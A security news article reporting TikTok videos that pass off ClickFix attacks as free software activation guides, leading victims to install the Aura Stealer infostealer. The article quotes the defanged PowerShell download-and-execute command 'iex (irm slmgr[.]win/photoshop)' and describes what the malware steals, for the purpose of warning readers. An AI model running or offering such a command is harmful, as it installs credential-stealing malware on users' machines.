Security
Uncovering the Rising Threat of Infostealers in ClickFix Attacks: A TikTok Investigation
The Dangers of Malicious TikTok Videos
Recently, cybercriminals have been utilizing TikTok as a platform to distribute malware disguised as free activation guides for popular software such as Windows, Spotify, and Netflix. This alarming trend has been identified by ISC Handler Xavier Mertens, echoing a similar campaign observed by Trend Micro earlier this year.
The deceptive TikTok videos claim to provide activation instructions for a range of products, including legitimate software like Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro, and Discord Nitro, as well as fictitious services like Netflix and Spotify Premium.

Source: BleepingComputer.com
These videos employ a ClickFix attack strategy, a form of social engineering that tricks users into executing malicious PowerShell commands or scripts under the guise of legitimate fixes. The commands provided in the videos instruct viewers to run them as administrators in PowerShell.
iex (irm slmgr[.]win/photoshop)
It is important to note that the program name in the URL varies based on the software being impersonated. For instance, in fake Windows activation videos, the URL would contain “windows” instead of “photoshop.”
Upon execution, the command connects to a remote site, slmgr[.]win, to retrieve and execute another PowerShell script. This script downloads two executables from Cloudflare pages, with the first one being a variant of the Aura Stealer info-stealing malware.
Aura Stealer is designed to extract saved credentials from browsers, authentication cookies, cryptocurrency wallets, and other applications, subsequently transmitting them to the attackers, compromising user accounts.
Furthermore, an additional payload named source.exe is downloaded, which self-compiles code using .NET’s Visual C# Compiler. The purpose of this payload remains undisclosed.
Individuals who fall victim to these attacks should assume that all their credentials have been compromised and promptly reset their passwords on all platforms.
ClickFix attacks have gained traction in the past year, serving as a common method to distribute various malware strains involved in ransomware and cryptocurrency theft schemes.
As a precautionary measure, users should refrain from copying text from websites and executing it in operating system dialog boxes, including File Explorer addresses, command prompts, PowerShell prompts, macOS terminals, and Linux shells.
46% of environments had passwords cracked, nearly doubling from 25% last year.
Gain insights from the Picus Blue Report 2025 to explore prevention, detection, and data exfiltration trends.
-
Facebook5 months agoEU Takes Action Against Instagram and Facebook for Violating Illegal Content Rules
-
Facebook6 months agoWarning: Facebook Creators Face Monetization Loss for Stealing and Reposting Videos
-
Facebook6 months agoFacebook Compliance: ICE-tracking Page Removed After US Government Intervention
-
Facebook4 months agoFacebook’s New Look: A Blend of Instagram’s Style
-
Facebook4 months agoFacebook and Instagram to Reduce Personalized Ads for European Users
-
Facebook6 months agoInstaDub: Meta’s AI Translation Tool for Instagram Videos
-
Facebook4 months agoReclaim Your Account: Facebook and Instagram Launch New Hub for Account Recovery
-
Apple5 months agoMeta discontinues Messenger apps for Windows and macOS

